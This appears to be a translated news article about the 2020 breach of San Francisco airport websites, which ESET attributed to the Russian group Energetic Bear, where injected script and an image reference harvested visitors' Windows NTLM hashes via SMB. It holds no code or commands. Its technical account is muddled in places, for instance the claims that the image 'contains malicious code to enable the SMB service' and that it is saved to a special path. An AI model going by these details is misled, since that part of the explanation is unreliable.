The data breach at the San Francisco airport linked to Russian hacker

Earlier in San Francisco International Airport, California, the United States issued a statement admitting that its website was hacked and may leak user accounts and password data.

What’s more serious is that the attacker stole the Windows login password by complicated means. In other words, the attacker’s real purpose may not be San Francisco Airport.

As for the hacker background and attack methods, the security researcher from ESET considered the attacker to be the Energetic Bear team after traceability. Known by the security industry as Dragonfly or Energetic Bear is a relatively well-known hacker group from Russia.

This hacker group has been active in various cyber-attacks since 2010, so it is easy for security companies to find relevant codes when tracing the source.

The recently reported breach of #SFO airport websites is in line with the TTPs of an APT group known as Dragonfly/Energetic Bear. The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix #ESETresearch 1/2 pic.twitter.com/pDZMdb49lb

— ESET Research (@ESETresearch) April 14, 2020

ESET analyzed the malware code in the San Francisco Airport attack and found that some of its codes and methods of use are very similar to Energetic Bear.

However, these are only preliminary investigations so it is impossible to determine the real initiator. San Francisco Airport has cooperated with local law enforcement agencies to investigate the attack.

What is more surprising is that the attacker tried his best to launch the attack, but the target is not the data of the San Francisco airport. The attacker’s attack actually has other plans.

The investigation found that the attacker embedded malicious code on the San Francisco Airport website, which included malicious JavaScript scripts and a specially crafted pixel image.

When a Windows user visits the San Francisco Airport website, the browser will automatically download the pixel image to a special path in the system according to the attacker’s instructions.

This specially made pixel image also contains malicious code to enable the SMB service, and by default, Windows will verify the user password through NTLM.

Although the password is sent to the attacker’s server by hash encryption, the attacker can also restore the plain text content of the user’s password by brute force guessing.

With an account password, an attacker may launch an attack against some users, especially commercial enterprise users, such as stealing key information after entering the user system.

At present, San Francisco Airport has reset all account passwords on its website, but users who have logged in to the website using Windows also need to change the system password.